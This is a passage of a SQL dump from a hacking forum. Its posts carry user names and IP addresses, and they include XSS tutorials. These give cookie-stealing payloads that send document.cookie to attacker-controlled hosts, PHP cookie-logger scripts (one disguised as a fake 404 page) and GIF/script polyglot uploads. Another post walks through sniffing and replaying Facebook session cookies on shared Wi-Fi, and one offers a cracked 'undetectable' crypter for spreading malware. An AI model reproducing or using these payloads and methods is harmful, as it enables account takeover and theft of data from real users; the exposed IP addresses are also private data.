attack.\r\n## Written by: G0ld3n dr4g0n\r\n## for more info contact me at g0ld3n_dr4g0n[at]hotmail[dot]it\r\n\r\nIn the film we see the usual guy with dark glasses and leather jacket, hacking at the keyboard, in less than a minute he has the access codes of a login system. Science fiction? No, all true!\r\n\r\nThere are various ways to attack a website. I list a few:\r\n-XSS stands for cross-site scripting\r\n-SQL-Injection, Injection of SQL commands in a site\r\n-Blind Sql-Injection\r\n-RFI or Remote File Inclusion\r\n-LFI, Local File Inclusion\r\n-DOS, short for Denial of Service\r\n-DDoS, Distributed Denial of Service\r\n-Format-string attacks\r\n\r\n[b]What is an XSS:[/b]\r\nUnlike sql injection and other attacks on web applications, are vulnerable to this attack dynamic sites and not. The attack can be accomplished on any site that presents the use of JavaScript, VBScript, ActiveX, HTML and Flash. For those unfamiliar with these languages, just think that it\'s languages and applications that run directly from your Web browser (Internet Explorer, Netscape, Mozilla Firefox, Google Chrome, etc..). Then is a vulnerability that affects web sites with low control of variables. The XSS allows you to insert code to the browser level (often JavaScript code, but also php, html, etc.) in order to modify the source code of the webpage. Then, is possible of implementation, when a website takes as input data on which performs the operations (such as the internal search engine of the site but not only). This information is usually sent to the site via URL with a HTTP post method. These data, in non-secure sites, are displayed as they were posted by users. In this way anyone can get hold of sensitive data, such as cookies.\r\nTo do this we need only redirect our victim in a web page with the properly modified variables.\r\nA very important thing to say is that there are two types of XSS:\r\n\r\nStored: in which an attacker is able to permanently modify the content of a web page, for example by entering a comment appropriately prepared for a post in a blog.\r\nReflected: thanks to which it is possible to produce a URL that uses the vulnerable site will alter the content of the pages so not permanent and only for HTTP requests that use URLs such specially forged.\r\nThis vulnerability is due to errors of programmers, who often neglect completely the validation of input information passed with HTTP requests.\r\n \r\nThe XSS exploit the operation of parameters badly declared:\r\nTake for example this page in php:\r\n\r\n[code]\r\n<? / la variabile in esame è c\r\n$var = $_GET [\'c\'];\r\necho $var;\r\n?>\r\n[/code]\r\n\r\nI said precisely that \'c\' is a variable that is set up and printed on the page.\r\nIn URL level if we give the value \'hola\' to this variable we will get:\r\n\r\n[code]\r\nhttp://www.site.it/test.php?c=hola\r\n[/code] \r\n\r\nIn the written page, then we find text: hola\r\nFrom this we can understand that whatever value we give to c, this will be printed on the page.. and until they are words and numbers I would say everything is fine.. But if we will inject evil javascript code? Just think what would happen..\r\nWhen an attacker run his code in the browser, the code will run in the security-context (or zone) for hosting the website. With this level of privilege, the code has the ability to read, edit and transmit sensitive data accessible from any browser.\r\n\r\nA user may be vulnerable to XSS could be his account stolen (stealing cookies), his browser may be redirected elsewhere or possibly have a fraud of their data through the website they are visiting. Essentially, an XSS attack undermines the \"trust\" between a user and the website in question.\r\n\r\nThere are two types of cross-site scripting attacks: persistent attacks and attacks not persistent.\r\n\r\nThe non-persistent attacks require a user visits a specially modified link with malicious code. Once the link is accessed, the malicious code will run inside the browser. \r\nThe persistent attacks have malicious code in web pages that are hosted online for a period of time. \r\nExamples of favorite target of malicious users is the post in web mail, web chat, etc.The user who is unaware of everything does not have to click on a link in particular but simply visit the web page message containing malicious code.\r\n\r\n[b]Structure XSS:[/b]\r\nI would say that now there is one thing for sure: you must to have basic knowledge of html, js, etc to exploit this type of attack.\r\n \r\nA typical attack, base, and known by all is the string:\r\n[code] \r\n<script>alert(\"XSS\")</script>\r\n[/code]\r\n\r\nanalyze it:\r\n \r\n<script>: opening code in javascript with the various commands;\r\n \r\nalert: brings up a message alert (for who does\'nt know it is a simple TextBox);\r\n \r\n(\"XSS\"): is the string that is displayed inside of Alert, do not have to be text, but also numbers (in this case it is not necessary the use of \"\")\r\n \r\n</script>: javascript code closed;\r\n \r\nNow we analyze this string: \r\n \r\n[code]<script>alert(document.cookie)</script>[/code]\r\n \r\n<script> opening code in javascript with the various commands;\r\n \r\nalert: pops up an alert\r\n \r\n(document.cookie) instead of showing a string of text will display an alert with your cookie.\r\n\r\n[b]Filters:[/b]\r\nThe web master take defense very easy to overcome at times, others more complicated, and here comes the fun because it takes the imagination of each one of us to bring the so much desired alert!\r\nThese defenses are called \"filters\", or codes prohibiting the use of special characters. For someone less experienced may be considered completely solved, but not so! Take for example this filter:\r\n\r\n[code]\r\n<?\r\n$var = $_GET [\'c\'];\r\n$var = str_replace (\"<script>\", \"script\", $var);\r\necho $var;\r\n?>\r\n[/code]\r\n\r\nThis will block the use of <script> and </ script>, but we should not necessarily use these.\r\nThere are various types of filters, one of which is the addslashes filter, which will place a apex before each slash (the \"/\") making it useless to our code. This is the structure of the filter:\r\n\r\n[code]\r\n<?\r\nfunction addslashes ($var){\r\n$var = str_replace (\'\"\', \'\\\"\', $var);\r\n$var = str_replace (\"\'\", \"\\\'\", $var);\r\nreturn $var;\r\n}\r\n?>\r\n[/code]\r\n\r\nThat would be inserted into a php page:\r\n\r\n[code]\r\n<?\r\n$var = $_GET [\'var\'];\r\n$var = addslashes ($var);\r\necho $var;\r\n?>\r\n[/code]\r\n\r\nNow you may ask. This as we overcome as we can not put any tip? A simple method would be to convert our code to ASCII.\r\nA great site for other fantastic and ingenious XSS is: www.ha.ckers.org/xss.html\r\nNow we have seen a series of commands, all harmless at first, but imagine if instead of Alert we redirect the webpage to a cookie grabber? Soon also will explain what is a cookie, how to apply it and what is the technique of cookie grabbing. continue ...\r\n\r\n[b]Persistent attacks:[/b]\r\nMany web sites have message boards, tagboards, and more where you can leave one or more messages. A registered user is usually identified with a session ID cookie, so he can leave a message and be identified. If we inject malicious JavaScript code as a message, for example, we could also compromise the cookie who will read the message.\r\nThis is possible in case where the site/forum is vulnerable to XSS and injecting the command as a message visible to all:\r\n\r\n[code]\r\n<SCRIPT> document.location=‘http://attackerhost.example/cgi-bin/cookiesteal.cgi?’+document.cookie </SCRIPT>\r\n[/code]\r\n\r\nThis we have just mentioned is a typical example of a persistent attack ..\r\n\r\n[b]Non-persistent attacks:[/b]\r\nSome sites offer a view instead of customizable web, for example, when we carry out a site login and receive a welcome message can display some data in the URL, then visible to all. In the URL might read something like this:\r\n\r\n[code]\r\nhttp://site.example/index.php?sessionid=12345678&username=yourname\r\n[/code]\r\n\r\nif a malicious user might have modified the URL properly, inserting JS code capable of stealing cookies, you may take control of an account, obviously masking the code like this:\r\n\r\n[code]\r\nhttp://site.example/index.php?sessionid=12345678&username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65 %6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70 %3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65 %78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F %6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64 %6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73 %63%72%69%70%74%3E\r\n[/code]\r\n\r\n[b]Cookie Grabbing:[/b]\r\nTechnique of cookie grabbing.. What is it and how does it apply?\r\nThis technique is applicable at sites vulnerable to cross site scripting .. This vulnerability allows execution of arbitrary JavaScript code on the web application also allows the execution of malicious scripts acts to grabbing (take) cookies from the site itself...\r\n\r\nExample of malicious JavaScript code could be:\r\n\r\n[code]<script language=\"JavaScript\"> window.location=\"http://www.sitomio.net/logs.php?cooked=\"+document.cookie </script></span></p> <span style=\"color: #000000;\">\r\n[/code]\r\nWhat would be the url:\r\n\r\n[code]http://www.vulnerablesite.net?Keywords=%3Cscript+language%3D%22JavaScript%22%3E+window.location%3D%22http%3A%2F%2Fwww.mysite.net%2Flogs.php%3Fcooked%3D%22%2Bdocument.cookie+%3C%2Fscript%3E\r\n[/code]\r\n\r\nWhat happens? We read www.vulnerablesite.net is the site vulnerable to XSS, keywords is the variable vulnerable and www.mysite.net is where the vulnerable site is redirect to grabbing the cookies, exactly in logs.php files that we create:\r\n\r\n[code]\r\n<html>\r\n<head>\r\n<title>404 Not Found</title>\r\n</head>\r\n<body>\r\n<h1>Not Found</h1>\r\n<?php\r\n$capo = \"</span><br /><span style=\"color: #000000;\"> \";\r\n$_GET[\'data\'] = $data; //prende ciò che sta dopo \"data\" nell\'url e lo mette nella variabile \"data\"\r\n$fh = fopen(\"cookies.txt\",\'a+\'); //setta in \"fh\" le condizioni per aprire il file cookies.txt\r\nfwrite($fh, \"$data\"); //apre il file cookies.txt o lo crea se non esiste e ci scrive la variabile \"data\"\r\nfwrite($fh, \"$capo\");//va a capo\r\nfclose($fh); //chiude il file\r\n?>\r\n<p>The requested URL was not found on this server.</p>\r\n</body>\r\n</html>\r\n[/code]\r\nAs you can see, all processes are hidden, and when the page simply we will display \"The requested URL was not found on this server\", pretending a fake 404 not found, and in the cookie.txt will be saved all cookies of victims.\r\n\r\n[b]Upload XSS:[/b]\r\nHere\'s another neat trick to exploit the XSS: D\r\n\r\nWe open a picture .gif with our beloved notepad and delete everything that is inside and edit it for example with this:\r\n\r\n[code]GIF89a<script>alert(“XSS”)</script>[/code]\r\n\r\nClose, save and upload the file, is will appear your alert!\r\n\r\nHere\'s what to put before the script to make sure that the image remains in its extension:\r\n\r\n-PNG = ‰PNG\r\n-GIF = GIF89a\r\n-JPG = ÿØÿà JFIF\r\n-BMP = BMFÖ\r\n\r\nAs you can see we used GIF89 before the string to get the iimagine extension. Gif', '41.174.60.186', '699284666', '1', '0', '0', '0', '1', '1d6dd7790d5a8f9d774653fdddc97f4a', '0', '0'); INSERT INTO mybb_posts VALUES('232', '33', '88', '20', 'RE: Heavens Crypter FUD', '0', '1', 't3h jok3r', '1344547811', 'Both links are dead.', '41.174.14.12', '699272716', '1', '0', '0', '0', '1', '0e06f15d7547dec8036e8fdf94b31591', '0', '0'); INSERT INTO mybb_posts VALUES('233', '98', '0', '20', 'FREE UD RazorCrypter (Cracked)', '0', '1', 't3h jok3r', '1344547965', 'Hey guys, This is undetectable crypter with a update to update the version. I found this on the web, thought this would come in handy for server spreaders. \r\n\r\nlink:\r\n\r\nhttp://www.mediafire.com/?efxlimfsgclvt0a\r\n\r\nScann:\r\n\r\nhttp://vscan.novirusthanks.org/analysis/...wdC1leGU=/', '41.174.14.12', '699272716', '1', '0', '0', '0', '1', '32db8495d12b163f83e3ec8f65b963e4', '0', '0'); INSERT INTO mybb_posts VALUES('234', '91', '219', '42', 'RE: Gold-medal swimmer admits to cheating in 100 breaststroke', '0', '20', 'JakeUS', '1344827624', 'That\'s dumb, at least he did the right thing and told on himself.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'e02d7ad0d2758086b0598d1edf3c5a65', '0', '0'); INSERT INTO mybb_posts VALUES('235', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '44', 'M4573RH4X0R', '1344830641', '[quote=\'Timmy\' pid=\'175\' dateline=\'1344114849\']\r\nHey guys! I have been working a while on this! And I finally found a way to get free drinks out of vending machines, just by using the codes the programers and re-fillers use! \r\n\r\nYou can also download it at my website http://tackyshack.blogspot.com\r\n\r\nJUST GOTO MY WEBSITE PLEASE :D\r\n\r\nCredits: Sit hacks a lot\r\n[/quote]\r\n\r\nNice site to make some money from.', '207.172.50.206', '-810798386', '0', '0', '0', '0', '1', '1dcdea4da4221807d6138b684382353a', '0', '0'); INSERT INTO mybb_posts VALUES('236', '54', '138', '16', 'RE: [tut]How to SE McDonald', '0', '44', 'M4573RH4X0R', '1344831216', 'Thanks p420!\nPretty basic but it did get the job done! (email method)', '207.172.50.206', '-810798386', '0', '0', '0', '0', '1', 'fa86c9848e83c938412040e1d8bc0f05', '0', '0'); INSERT INTO mybb_posts VALUES('237', '99', '0', '3', '[Previews added]New theme for LH', '0', '1', 't3h jok3r', '1344895893', 'I\'ve been working on a new theme for L33T Hacking for a couple of days and It\'s almost completed, hope you all like the theme.\r\n\r\n[b]Edited[/b]\r\n\r\nUpon user request, I have attached 3 screenshots of the theme.\r\n\r\nHope you like it.', '41.174.59.185', '699284409', '1', '0', '1', '1345061238', '1', '1fefc81835a942ac652d88e02b3878fe', '0', '1345061238'); INSERT INTO mybb_posts VALUES('238', '99', '237', '3', 'RE: New theme for LH', '0', '4', 'Triple H', '1344897854', 'That\'s cool. I can\'t wait for the new theme.', '41.174.59.185', '699284409', '1', '0', '0', '0', '1', '4d1bd7bda8d77923db5d6afe22b93de5', '0', '0'); INSERT INTO mybb_posts VALUES('239', '93', '221', '18', 'RE: Gmail Brute Forcer Tool', '0', '4', 'Triple H', '1344898404', 'Me too, I\'m going to download this right now.', '41.174.59.185', '699284409', '1', '0', '0', '0', '1', 'eace8f21b5949f5af31f2bf65f1dd020', '0', '0'); INSERT INTO mybb_posts VALUES('240', '100', '0', '18', '[tut]Hack any facebook or account that use username ID and forum password', '0', '4', 'Triple H', '1344898582', '[color=#800000][u][i][b]HACK FACEBOOK OR ANY ACCOUNT USER ID AND PASSWORD ON WIFI OR LAN[/b][/i][/u][/color]\n\n[u][i][b][size=xx-large]THIS TRICK ONLY WORK ON WIFI OR LAN.[/size][/b][/i][/u]\n[size=large]To hack facebook or account like twitter,hi5, orkut,or anything else we have to knowledge about what software we are using for hack and how to operate them.\n in this hacking method we use two most popular software one is wireshark and other is mozilla.\n1.wireshark:- Wireshark is a free and open-source packet , analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education.\n\n2.mozzila:- Mozilla Firefox is a free and open source web browser developed for Microsoft Windows, Mac OS X, and Linux.\n\n[/size]\n[size=x-large][b]STEP TO HACK[/b] :-[/size]\n\n[size=large]1.Download wireshark from [/size][url=http://adf.ly/BgCbT][u][i][b][size=large]HERE[/size].[/b][/i][/u][/url]\n[size=large]2.Download firefox from [/size][url=http://adf.ly/BgClt][u][i][b]HERE[/b][/i][/u][/url][size=large].( Its work on older version on mozilla only so you have to download mozilla from given link.)\n3. After download both software install both in your pc.\n4. After installation open wireshark and click on capture option in wireshark.[/size]\n[img]http://i1069.photobucket.com/albums/u477/manishtaraiya/1-1.jpg[/img]\n[size=large]5. select wifi or lan driver name from list( if you don\'t know which one is you wifi or lan card then tick on all interface.[/size]\n[img]http://i1069.photobucket.com/albums/u477/manishtaraiya/2-1.jpg[/img]\n[size=large]6. after that it will sniffing your network and showing packet.\n7. now goto edit>find packet\ntype datr in filter>select string>tick on packet detail>after that click on find.\nthis will show you only datr packet.[/size]\n[img]http://i1069.photobucket.com/albums/u477/manishtaraiya/3-1.jpg[/img]\n OR\n[size=large]type in filter >http.cookie contains\"datr\"\nthis will show you only datr packet.[/size] \n[img]http://i1069.photobucket.com/albums/u477/manishtaraiya/4-1.jpg[/img]\n[size=large]8.datr packet only for facebook which is used on your network if you not get any packet that means no one is using facebook on your network.\n9. when you get datr packet then it show captured cookie like this.\n10. now copy cookie by>right click on cookie line>copy>bytes>printable text only.[/size]\n[img]http://i1069.photobucket.com/albums/u477/manishtaraiya/6-1.jpg[/img]\n[size=large]11. paste it into notepad and separate all cookie format by clicking enter after every semicolon (;)[/size]\n[img]http://i1069.photobucket.com/albums/u477/manishtaraiya/95.jpg[/img]\n\n\n[color=#800000][size=large][u][i][b]STEP TO OPEN VICTIM FACEBOOK:-[/b][/i][/u][/size][/color]\n\n\n[size=large]1. Open mozilla and open this link to download add n edit cookie. [url=http://adf.ly/BgCur][u][i][b]CLICK HERE[/b][/i][/u].[/url]\n2. After install restart your browser and goto tool>cookie editor(open)[/size]\n[img]http://i1069.photobucket.com/albums/u477/manishtaraiya/8-1.jpg[/img]\n[size=large]3. delete all cookie from list.[/size]\n[img]http://i1069.photobucket.com/albums/u477/manishtaraiya/10-1.jpg[/img]\n[size=large]4.open facebook.com in your browser and refresh cookie in cookie manager you got some cookie of facebook.com again delete all cookie and add new cookie.\n5. the copied cookie in notepad like this\n{\nCookie: \nc_user=100002448897925; \ndatr=yfgZUBPsszXBGqtAG3-dMEqb; \nfr=0hCy3aDiaJZBth644.AWXSLDfVHnng2IVaZZ9DOu4dOD4; \nlu=Rgo8Z7mh2pe7_ABoftzhA1Vw; \nxs=63%3A3xXUBxzshD2eEg%3A0%3A1344408207; \nsub=1; p=0; presence=EM344408378EuserFA21B02448897985A2EstateFDsb2F0Et2F_5b_5dElm2FnullEuct2F1344407608BEtrFnullEtwF2273934543EatF1344408215307G344408378845CEchFDp_5f1B02448897985F1CC \n}\nNOTE:- this cookie doesn\'t work this is for tutorial purpose only\n\n6.If you are getting more cookie list there are no problem.\n7. now click on add> in name field fill c_user > in content fill 100002448897925> in host put .facebook.com >in path put / >after that click on save \nadd all cookie in cookie manager and remember don\'t forget to add cookie in cookie manager and don\'t mistake in spelling.[/size]\n[img]http://i1069.photobucket.com/albums/u477/manishtaraiya/11.jpg[/img]\n[size=large]8.after adding all cookie close cookie manager and reload facebook page by pressing F5 or reload button.[/size]', '41.174.59.185', '699284409', '1', '0', '4', '1344898661', '1', 'cd8794fec42d20c54f80adfe23f56b80', '0', '1344898661'); INSERT INTO mybb_posts VALUES('241', '101', '0', '34', '[tut]Glossy Logo', '0', '4', 'Triple H', '1344898868', '[size=medium][color=#00BFFF]Hey fellow LH members,\n\ntoday I\'m showing you how to make a glossyish sig/logo/text!\n\n1.Make a new project with any background color and size you prefer.\n[img]http://i.imgur.com/WZiHl.png[/img]\n2.Create a text with any size and colour you prefer.\n[img]http://i.imgur.com/f50qW.png[/img]\n3.Choose the form tool and create a ellpipse over your text and fill it with white and choose opacity 30-45 just as you like.And set hard mix.\n[img]http://i.imgur.com/G1EAT.png[/img]\n4.Reduce the 2 layers to 1 layer and delete the overstanding ellipse parts\nTo do so choose the fill tool and choose Mode:Delete.\n[img]http://i.imgur.com/HWRAj.png[/img]\n5.Create another, bigger ellipse and reduce the opacity and repeat step 4.\n[img]http://i.imgur.com/QBTLf.png[/img]\n\nCongrats. you just made a glossyish logo!\n\nOutput should be something like this:\n[img]http://i.imgur.com/6Y3Fr.png[/img]\n[img]http://i.imgur.com/TP8EU.png[/img]\n\nThis is my first tutorial and my english isn\'T so good so eexcuse me if not everything is perfect, thanks.\nI made this in hurry so the pic wasn\'T that cool but look at the other image I made before with patience.;)\n\nCredits: Tunez[/color][/size]', '41.174.59.185', '699284409', '1', '0', '1', '1345247022', '1', 'c4a997aa028b66e0a1d469d453507a6b', '0', '1345247022'); INSERT INTO mybb_posts VALUES('242', '66', '157', '63', 'RE: Read this thread before you make a Request!', '0', '1', 't3h jok3r', '1344901979', 'Great guide on graphics request.', '41.174.59.185', '699284409', '1', '0', '0', '0', '1', '263cb971cf39730ec6fa6534984c9e9c', '0', '0'); INSERT INTO mybb_posts VALUES('6326', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1351136908', 'True and @Ipod without you maybe LH wouldn\'t be that successful.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0edffcabf149ab2d832956dd01f55d87', '0', '0'); INSERT INTO mybb_posts VALUES('244', '99', '237', '3', 'RE: New theme for LH', '0', '20', 'JakeUS', '1344914947', 'I like the preview so far, it\'s good looking.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '35e182584e085d9de9ffdc32310b6645', '0', '0'); INSERT INTO mybb_posts VALUES('245', '99', '237', '3', 'RE: New theme for LH', '0', '2', 'Apathy', '1344916939', 'Any previews?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '763ce4cad0ed84eed5e5903e38e8f3dd', '0', '0'); INSERT INTO mybb_posts VALUES('246', '101', '241', '34', 'RE: [tut]Glossy Logo', '0', '2', 'Apathy', '1344917062', 'Nice tutorial thanks.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '706eb76936104e30a52765c1d1065e9b', '0', '0'); INSERT INTO mybb_posts VALUES('247', '99', '245', '3', 'RE: New theme for LH', '0', '1', 't3h jok3r', '1344954336', '[quote=\'Apathy\' pid=\'245\' dateline=\'1344916939\']\r\nAny previews?\r\n[/quote]\r\n\r\nCurrently only staff can view the theme. You have to go to UCP>Edit Options>Styles>Green', '41.151.150.150', '697800342', '1', '0', '0', '0', '1', '2ea5241be2234ff928a03b7e368dade4', '0', '0'); INSERT INTO mybb_posts VALUES('248', '73', '174', '12', 'RE: |TUT| How to get any Website Login Passwords with uses SSL Encryption', '0', '50', 'sana khan', '1344955695', 'wow!!! you explained everything well here.....', '182.177.26.34', '-1229907422', '0', '0', '0', '0', '1', '5ce3b5c8517126c6d3f79508eda2c238', '0', '0'); INSERT INTO mybb_posts VALUES('249', '103', '0', '12', '[Tutorial] Stealing Cookies With XSS', '0', '51', 'SAPBasisWorld', '1344957203', 'Stealing Cookie With XSS\r\n\r\nAuthor\r\n[url=http://www.sapbasisworld.com]SAP Basis World -SAP ABAP Java HANA Netweaver Basis[/url]\r\n\r\n\r\nIntroduction\r\n\r\nI thought it was about time for someone to post a cookie stealing tutorial, so I decided to write one for you from the ground up.\r\n\r\nNOTE: Again... this was written to educate you on the security aspects of the following information, not to teach you how to break the law or do something stupid. Use what you learn from this to make your website more secure/use better browsing habits, not break into other websites.\r\n\r\nBackground\r\n\r\nFirst, make sure you\'ve read these two articles because I\'m going to assume you already understand everything written in them:\r\n\r\nXSS Complete Guide\r\nAll About Cookies and Security\r\n\r\nNow we need to understand a bit more about how XSS actually works before moving on. From the above article, you already know a bit of the theory behind XSS, so we\'ll get right to the code. Let\'s say a web page has a search function that uses this code:\r\n\r\nCode:\r\n\r\n<tr><td>Name</td><td><input type=\"text\" name=\"advisor_name\" value=\"\"></td></tr>\r\n\r\nWe want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script:\r\n\r\nCode:\r\n\r\n<script>alert(\"test\")</script>\r\n\r\nWhen we enter this into the search box and click search, nothing happens. Why? It\'s still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this:\r\n\r\nCode:\r\n\r\n<tr><td>Name</td><td><input type=\"text\" name=\"advisor_name\" value=\"<script>alert(\"test\")</script>\"></td></tr>\r\n\r\nNote the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:\r\n\r\nCode:\r\n\r\n\"><script>alert(\"test\")</script>\r\n\r\nThis should close the quotes end the input section so that our script can be rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying \"test\", showing us our script was executed. Keep in mind that you\'re not actually writing this data to the server (unless you\'re injecting it with a script that actually modifies the page on the server\'s end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example,\r\nCode:\r\n\r\nhttp://www.site.com/search.php?q=\"><script>alert(\"test\")</script>\r\n\r\nOf course, if you don\'t want the recipient to see the injection, you\'ll need to hex the query. You can do that here:\r\nCode:\r\n\r\nhttp://centricle.com/tools/ascii-hex/\r\n\r\nHexing the query of this url gives us\r\nCode:\r\n\r\nhttp://www.site.com/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2 f%73%63%72%69%70%74%3e\r\n\r\nThe above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.\r\n\r\nUsing XSS to Steal Cookies\r\n\r\nOK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies?\r\n\r\nThe easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file.\r\n\r\nFirst you\'ll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):\r\n\r\nCode:\r\n\r\n<?php \r\n\r\nfunction GetIP() \r\n{ \r\n if (getenv(\"HTTP_CLIENT_IP\") && strcasecmp(getenv(\"HTTP_CLIENT_IP\"), \"unknown\")) \r\n $ip = getenv(\"HTTP_CLIENT_IP\"); \r\n else if (getenv(\"HTTP_X_FORWARDED_FOR\") && strcasecmp(getenv(\"HTTP_X_FORWARDED_FOR\"), \"unknown\")) \r\n $ip = getenv(\"HTTP_X_FORWARDED_FOR\"); \r\n else if (getenv(\"REMOTE_ADDR\") && strcasecmp(getenv(\"REMOTE_ADDR\"), \"unknown\")) \r\n $ip = getenv(\"REMOTE_ADDR\"); \r\n else if (isset($_SERVER[\'REMOTE_ADDR\']) && $_SERVER[\'REMOTE_ADDR\'] && strcasecmp($_SERVER[\'REMOTE_ADDR\'], \"unknown\")) \r\n $ip = $_SERVER[\'REMOTE_ADDR\']; \r\n else \r\n $ip = \"unknown\"; \r\n return($ip); \r\n} \r\n\r\nfunction logData() \r\n{ \r\n $ipLog=\"log.txt\"; \r\n $cookie = $_SERVER[\'QUERY_STRING\']; \r\n $register_globals = (bool) ini_get(\'register_gobals\'); \r\n if ($register_globals) $ip = getenv(\'REMOTE_ADDR\'); \r\n else $ip = GetIP(); \r\n\r\n $rem_port = $_SERVER[\'REMOTE_PORT\']; \r\n $user_agent = $_SERVER[\'HTTP_USER_AGENT\']; \r\n $rqst_method = $_SERVER[\'METHOD\']; \r\n $rem_host = $_SERVER[\'REMOTE_HOST\']; \r\n $referer = $_SERVER[\'HTTP_REFERER\']; \r\n $date=date (\"l dS of F Y h:i:s A\"); \r\n $log=fopen(\"$ipLog\", \"a+\"); \r\n\r\n if (preg_match(\"/\\bhtm\\b/i\", $ipLog) || preg_match(\"/\\bhtml\\b/i\", $ipLog)) \r\n fputs($log, \"IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>\"); \r\n else \r\n fputs($log, \"IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \\n\\n\"); \r\n fclose($log); \r\n} \r\n\r\nlogData(); \r\n\r\n?>\r\n\r\nThis script will record the cookies of every user that views it.\r\n\r\nNow we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection:\r\n\r\nCode:\r\n\r\n\"><script language= \"JavaScript\">document.location=\"http://yoursite.com/whateveryouwant.php?cookie=\" + document.cookie;document.location=\"http://www.whateversite.com\"</script>\r\n\r\nyoursite.com is the server you\'re hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you\'re exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don\'t know anything happened. Note that this injection will only work properly if you aren\'t actually modifying the page source on the server\'s end. Otherwise the unmodified page will actually be the modified page and you\'ll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:\r\n\r\nCode:\r\n\r\n\"><a href=\"#\" onclick=\"document.location=\'http://yoursite.com/whateveryouwant.php?cookie=\' +escape(document.cookie);\"><Click Me></a></script>\r\n\r\nThis will eliminate the looping problem since the user has to cilck on it for it to work, and it\'s only a one-way link. Of course, then the user\'s trail ends at your cookie stealing script, so you\'d need to modify that code a little to keep them from suspecting what\'s going on. You Could just add some text to the page saying something like \"under construction\" by changing the end of our php script from this:\r\n\r\nCode:\r\n\r\nlogData(); \r\n?>\r\n\r\nto this:\r\nCode:\r\n\r\nlogData();\r\n\r\necho \'<b>Page Under Construction</b>\'\r\n?>\r\n\r\nNow when you open log.txt, you should see something like this:\r\n\r\nCode:\r\n\r\nIP: 125.16.48.169 | PORT: 56840 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: http://www.ifa.org.nz/search.php | \r\n\r\nDATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE: cookie=PHPSESSID=889c6594db2541db1666cefca7537373\r\n\r\nYou will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie\'s fields to match the data from the cookie in your log file and refresh the page. The server thinks you\'re the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.\r\n\r\nSummary\r\n\r\nSo in summary:\r\n1. Test the page to make sure it\'s vulnerable to XSS injections.\r\n2. Once you know it\'s vulnerable, upload the cookie stealer php file and log file to your server.\r\n3. Insert the injection into the page via the url or text box.\r\n4. Grab the link of that page with your exploited search query (if injection is not stored on the server\'s copy of the page).\r\n5. Get someone to use that link if necessary.\r\n6. Check your log file for their cookie.\r\n7. Modify your own cookie to match the captured one and refresh the page.\r\n\r\nCredits : [url=http://www.sapbasisworld.com]SAP Basis World -SAP ABAP Java HANA Netweaver Basis[/url]', '180.215.45.255', '-1260966401', '0', '0', '0', '0', '1', 'e2146ec7fa8abdb1ef506b41a31f234e', '0', '0'); INSERT INTO mybb_posts VALUES('250', '98', '233', '20', 'RE: FREE UD RazorCrypter (Cracked)', '0', '13', 'unixmoon', '1344964210', 'Sorry to say but you did a bad thing by upload the crypter to Mediafire because then it won\'t remain FUD for a very long time.', '41.174.19.86', '699274070', '0', '0', '0', '0', '1', '757f4de682a2fc43b2949640c6249b99', '0', '0'); INSERT INTO mybb_posts VALUES('251', '104', '0', '33', 'Photoshop vs Gimp', '0', '13', 'unixmoon', '1344964293', 'Which one is a better program? I want to get into graphics.', '41.174.19.86', '699274070', '0', '0', '0', '0', '1', '62bb91f75f8ecbce3d5e9ad7f3bd3c75', '0', '0'); INSERT INTO mybb_posts VALUES('252', '99', '237', '3', 'RE: New theme for LH', '0', '13', 'unixmoon', '1344964367', 'What about a preview for the normal members?', '41.174.19.86', '699274070', '0', '0', '0', '0', '1', '6326d97b8a06c2cb898afede0ca1a8a0', '0', '0'); INSERT 